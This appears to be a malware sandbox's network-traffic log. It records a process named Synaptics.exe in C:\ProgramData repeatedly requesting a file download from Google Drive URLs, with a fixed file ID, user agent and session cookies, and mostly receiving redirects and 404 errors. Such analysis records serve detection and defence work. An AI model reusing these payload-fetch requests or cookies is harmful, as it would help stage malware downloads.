                                                                                                                                                        X-GUploader-UploadID: AFiumC4QkSJ7-dDZV8A6Y0lQ4_E3x9Aj5rRDV8M1wVyAokm0sezSQqxyGKDavb4BN2vmoqbu
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-AgOKDP1o0SBVbyS_DaFN6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:20 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:20 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="37_MZJ6kvE0KYvw7szPGSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:20 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.7 | 49980 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:19 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IGiAX4FOjqx5XaL75oJ-cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.7 | 49982 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:20 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6AndLhlbsNbkvm_Y0XT6VlLuxIXh3W7btSxNr7FWjt4TxbVQx542CdMItuCww7_TRyuraWJl0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PIinZ9V_Ffr9OtBcF8AJoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:20 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:20 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="K5QOagPcwddrLgLEwC-yPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:20 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.7 | 49988 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:20 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-e9TElWg4k5s-xpq1rdPcDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 49989 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:20 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-N56U_1NvD5vH2rS5H-GT4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 49990 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:20 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:21 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5-yy1lnQegMSWXV5_qtixuAsg15L25M5idbxE8pWe1ulbfhPZ--cRApXuhHMPjON42nNiGJxQ
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:20 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1uzGSilDyRMcTPHMa0H6Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:21 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:21 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="NWpYp5z9065FON__Lb-eIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:21 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 49995 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:20 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:21 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6WzJCHHFCitdly-6sDww3fQihnAeOrZ4Q1qMY9CHB5sVq1wWUQNKZiu8w8FpwpbasK
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YFbwMx68ooDA5V73JvI3Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:21 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:21 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="iNNMc5V7mX-_Pmme2U-3tA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:21 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 50003 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:21 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4SMBIUrWcQow35bBBwpH4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.7 | 50004 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.7 | 50005 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:21 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.7 | 50007 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:21 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.7 | 50015 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:22 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:23 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4lQun2pwI-_fZ7VQBA-5boXVt7qC0bOuHMkaQrEVZ_fhDewdBV2uVav1Q-z30CcrA_
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-x4mOr7Ug1u9nrwJskkTDdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:23 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
